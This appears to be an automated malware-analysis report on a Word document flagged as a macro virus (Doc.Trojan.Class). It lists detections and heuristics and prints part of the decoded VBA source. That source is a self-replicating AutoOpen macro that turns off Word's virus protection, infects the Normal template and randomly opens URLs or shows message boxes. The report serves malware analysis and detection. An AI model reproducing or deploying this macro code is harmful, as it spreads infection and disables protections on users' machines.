Verdict: MALICIOUS
Risk Score: 262
MITRE ATT&CK: T1059.005 Visual Basic

Malware Insights
The sample exhibits characteristics of legacy WordBasic macro viruses and contains VBA macros, specifically AutoOpen and Auto_Close, which are commonly used to execute malicious code upon document opening. ClamAV detections further indicate its malicious nature. The embedded URLs, while mostly benign or unknown, are included as potential indicators.
Heuristics (6)

- ClamAV: Doc.Trojan.Class-36 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Class-36
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN)
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.cannabisculture.com (in document text, OLE body)
  - http://www.Microsoft.com (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23182 bytes |

SHA-256: 1249148dde102125d8145d9453a271418b07567bd84464282141dd5dac62f925
Detection (ClamAV): Doc.Trojan.Class-29
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
'1260725744891540719504126072574489154071950412607257448915407195041260725744891540719504
Randomize
'9361335736944422225936133573694442222593613357369444222259361335736944422225
x = 0: o = 0
'10583180112420650839616105831801124206508396161058318011242065083961610583180112420650839616
On Error GoTo 93
'16749620316932004136609167496203169320041366091674962031693200413660916749620316932004136609
Options.VirusProtection = False
'2266801248143360565824226680124814336056582422668012481433605658242266801248143360565824
Options.SaveNormalPrompt = False
'4325692828915961542921432569282891596154292143256928289159615429214325692828915961542921
Options.ConfirmConversions = False
'3213952562528189066816321395256252818906681632139525625281890668163213952562528189066816
fx = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'372844572114288855296372844572114288855296372844572114288855296372844572114288855296
xf = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'3194736484110334016319473648411033401631947364841103340163194736484110334016
If xf > 96 And fx > 0 Then GoTo 93
'318129840938479530244318129840938479530244318129840938479530244318129840938479530244
If xf < 96 Then
'4837624291649524051600483762429164952405160048376242916495240516004837624291649524051600
Set xs = NormalTemplate.VBProject.VBComponents.Item(1)
'2057359922527128725264205735992252712872526420573599225271287252642057359922527128725264
ActiveDocument.VBProject.VBComponents.Item(1).Name = xs.Name
'7016777166429338208656701677716642933820865670167771664293382086567016777166429338208656
ActiveDocument.VBProject.VBComponents.Item(1).Export Application.StartupPath & "seedii$.dll"
'13444322222519281544164134443222225192815441641344432222251928154416413444322222519281544164
End If
'568493417617033002769568493417617033002769568493417617033002769568493417617033002769
If fx = 0 Then Set xs = ActiveDocument.VBProject.VBComponents.Item(1)
'15386320051635112388689153863200516351123886891538632005163511238868915386320051635112388689
k = Int(Rnd(1) * 100) + 1
'208513600361988676208513600361988676208513600361988676208513600361988676
If k = 99 Then ActiveWindow.WindowState = wdWindowStateMinimize: ActiveDocument.FollowHyperlink Address:="http://www.cannabisculture.com", NewWindow:=False, AddHistory:=False, ExtraInfo:=Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(47) + Chr(83) + Chr(69) + Chr(69) + Chr(68) + Chr(73) + Chr(73)
'1207965633641848140100120796563364184814010012079656336418481401001207965633641848140100
l = Int(Rnd(1) * 75) + 1
'1487135819565962310656148713581956596231065614871358195659623106561487135819565962310656
If l = 74 Then ActiveWindow.WindowState = wdWindowStateMinimize: ActiveDocument.FollowHyperlink Address:="http://www.Microsoft.com", NewWindow:=False, AddHistory:=False, ExtraInfo:=Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(47) + Chr(83) + Chr(69) + Chr(69) + Chr(68) + Chr(73) + Chr(73)
'212311126812447577729212311126812447577729212311126812447577729212311126812447577729
m = Int(Rnd(1) * 50) + 1
'4696192384939151349689469619238493915134968946961923849391513496894696192384939151349689
If m = 49 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(80) + Chr(82) + Chr(79) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83)
'151681392812028061156151681392812028061156151681392812028061156151681392812028061156
n = Int(Rnd(1) * 25) + 1
'The GeniusTrueFalse8.0.4412c:\program files\microsoft office\office\startupLaffADayII.doc8.0a
If n = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(32) + Chr(83) + Chr(69) + Chr(69) + Chr(68) + Chr(32) + Chr(73) + Chr(73)
'The GeniusTrueFalse8.0.4412c:
```

... (truncated)